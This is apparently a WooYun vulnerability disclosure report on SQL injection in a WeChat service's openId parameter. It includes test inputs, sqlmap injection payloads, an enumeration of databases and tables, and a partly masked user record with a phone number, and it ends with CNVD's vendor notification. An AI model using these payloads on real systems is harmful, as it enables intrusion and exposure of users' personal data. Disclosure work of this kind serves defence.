乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-04: 细节已通知厂商并且等待厂商处理中 2016-01-08: 厂商已经确认,细节仅向厂商公开 2016-01-18: 细节向核心白帽子及相关领域专家公开 2016-01-28: 细节向普通白帽子公开 2016-02-07: 细节向实习白帽子公开 2016-02-22: 细节向公众公开
号码登记
浏览器打开点我要推荐
http://**.**.**.**/hkwx/suggestionPersonController.do?goRandomPage&openId=*********
输入'
输入'and'1'='1
输入'and'1'='2
注入点
http://**.**.**.**/hkwx/suggestionPersonController.do?goRandomPage&openId=**********
sqlmap identified the following injection points with a total of 246 HTTP(s) requests:---Place: GETParameter: openId Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: goRandomPage&openId=oV*************' AND 7886=7886 AND 'mXXN'='mXXN Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: goRandomPage&openId=oV*************' AND (SELECT 6649 FROM(SELECT COUNT(*),CONCAT(0x716b696471,(SELECT (CASE WHEN (6649=6649) THEN 1 ELSE 0 END)),0x7163737871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zrCN'='zrCN Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: goRandomPage&openId=oV*************' AND SLEEP(5) AND 'fOLT'='fOLT---web application technology: Nginx, JSPback-end DBMS: MySQL 5.0
数据库
available databases [5]:[*] hkwx[*] information_schema[*] mysql[*] performance_schema[*] test
current database: 'hkwx'
Database: hkwx+------------------------------+---------+| Table | Entries |+------------------------------+---------+| weixin_mbmobile_detail | 1055712 || suggestionperson | 1005631 || menuclick201506 | 854342 || wy_mbkh_data | 845483 || menuclick201412 | 788829 || menuclick201509 | 693634 || menuclick201505 | 652051 || menuclick201411 | 619970 || userinfo | 619458 || gzuserinfo | 592817 || weixin_motheractivity_record | 581052 || menuclick201508 | 573609 || menuclick201410 | 556975 || menuclick201510 | 554747 || menuclick201501 | 538485 || menuclick201507 | 469292 || menuclick201503 | 460616 || receivetext | 434467 || weixin_user_school | 395047 || menuclick201511 | 385406 || menuclick201504 | 384474 || menuclick201502 | 383457 || menuclick201512 | 378417 || weixin_qxperson | 264192 || weixin_aim_mobile | 142930 || regist | 124220 || menuclick201601 | 111508 || weixin_business_record | 95157 || menuclick201409 | 90158 || prizerecord | 84053 || weixin_motheractivity | 78452 || weixin_gzyh_gprs | 40716 || weixin_task_mobile | 35676 || t_s_log | 34381 || weixin_business_total | 16170 || hduserinfo | 10090 || weixin_setword_total | 6946 || weixin_setword_record | 6791 || menuclick_total | 6397 || menuclick201408 | 6118 || hdrecord | 5540 || regist_total | 4250 || weixin_signin | 4076 || weixin_qian_dao | 3145 || weixin_kuandai_college | 2634 || weixin_mobile_vote_record | 1740 || sharerecord | 1685 || weixin_target_mobile | 882 || weixin_fwzx_user | 783 || test | 658 || gzuserinfo_total | 538 || t_s_attachment | 500 || userinfo_total | 495 || t_s_document | 487 || weixin_jt_manager | 374 || integration | 349 || t_s_online | 334 || weixin_scyw_activityorder | 330 || weixin_year_metting | 247 || weixin_tj_activityuser | 236 || weixin_recommend_card | 174 || t_s_role_function | 144 || weixin_sc_taocan_yuy | 141 || weixin_tj_activityrecord | 136 || t_s_function | 123 || newsitem | 113 |.....
select * from userinfo limit 100,1; [7]:[*] [*] 15093*****61[*] 0[*] 2014-10-06 22:04:25[*] 2c8f81884b002435014b110d882d12be[*] gh_065a64f56fc7[*] oVxGUjg-8Bc****DX8Q28A
weixin_user_school可以根据手机号查学校了
危害等级:高
漏洞Rank:10
确认时间:2016-01-08 18:19
CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。
暂无